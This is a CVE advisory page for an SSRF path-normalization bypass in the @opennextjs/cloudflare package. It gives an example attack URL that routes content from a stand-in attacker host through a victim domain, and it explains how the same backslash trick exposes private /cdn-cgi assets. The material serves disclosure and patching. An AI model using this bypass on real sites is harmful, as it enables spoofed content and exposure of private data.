CVE-2026-3125

EPSS 0.01%
Veröffentlicht 04.03.2026 18:14:31
Zuletzt bearbeitet 09.03.2026 17:51:18
Quelle cna@cloudflare.com
CVE-Watchlists
Login
Unerledigt
Login

A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs.

For example: 

 https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com 

In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services.

Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.

Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.

Betroffene Produkte Warnungen 0 Metriken 3 CWE 2 Referenzen 7

Daten sind bereitgestellt durch National Vulnerability Database (NVD)

Opennextjs ≫ Opennext For Cloudflare SwPlatformnode.js Version < 1.17.1

Zu dieser CVE wurde keine CISA KEV oder CERT.AT-Warnung gefunden.

EPSS Metriken
Typ	Quelle	Score	Percentile
EPSS	FIRST.org	0.01%	0.013

CVSS Metriken
Quelle	Base Score	Exploit Score	Impact Score	Vector String
nvd@nist.gov	6.5	3.9	2.5	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cna@cloudflare.com	7.7	0	0	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

CWE-706 Use of Incorrectly-Resolved Name or Reference

The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.

CWE-918 Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

https://github.com/opennextjs/opennextjs-cloudflare/pull/1147

Patch

Issue Tracking

https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1

Product

Release Notes

https://github.com/advisories/GHSA-rvpw-p7vw-wj3m

Third Party Advisory

https://www.cve.org/cverecord?id=CVE-2025-6087

Third Party Advisory

https://nvd.nist.gov/vuln/detail/CVE-2026-3125

CVE Source (NVD)

https://cveawg.mitre.org/api/cve/CVE-2026-3125

CVE Source (JSON)

https://euvd.enisa.europa.eu/vulnerability/CVE-2026-3125

EUVD

Team-orientierte Vulnerability Management Plattform

Features der Plattform

CVE-2026-3125